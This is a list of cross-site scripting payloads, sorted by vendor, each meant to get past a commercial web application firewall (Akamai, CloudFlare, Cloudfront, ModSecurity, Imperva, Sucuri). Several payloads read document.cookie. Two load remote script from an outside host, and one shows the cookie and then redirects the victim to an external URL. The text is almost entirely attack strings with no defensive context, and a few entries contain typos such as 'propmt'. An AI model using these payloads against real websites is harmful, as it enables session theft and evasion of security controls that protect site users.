Akamai WAF Bypasses:

';k='e'%0Atop['al'+k+'rt'](1)//

'><A HRef=' AutoFocus OnFocus=top//?.['ale'%2B'rt'](1)>

CloudFlare WAF Bypasses:

<Svg Only=1 OnLoad=confirm(document.cookie)>

<svg onload=alert&#0000000040document.cookie)>

%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

<Svg Only=1 OnLoad=confirm(atob('Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=='))>

<Img Src=OnXSS OnError=prompt(document.cookie)>

<Img Src=OnXSS OnError=prompt(1337)>

<Img Src=//X55.is OnLoad%0C=import(Src)>

<sVG/oNLY%3d1//On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>

Cloudfront WAF Bypasses:

'>%0D%0A%0D%0A<x '='foo'><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//>'>

';window/aabb/['al'%2b'ert'](document./aabb/location);//

6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/

'>'><details/open/ontoggle=confirm('XSS')>

ModSecurity WAF Bypasses:

<svg onload='new Function['Y000!'].find(al\u0065rt)'>

Imperva WAF Bypasses:

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle='propmt(document.cookie);'>

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>

<sVg OnPointerEnter='location=javas+cript:ale+rt%2+81%2+9;//</div'>

<Img Src=//X55.is OnLoad%0C=import(Src)>

Sucuri WAF Bypasses:

<a href='j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://github.com/coffinxp';'>ClickMe</a>

<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe

<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(1337)>ClickMe

<button onClick='prompt(1337)'>Submit</button>

'><img src=x onerror=alert(document.cookie)>

<A HREF='https://www.cia.gov/'>Click Here </A>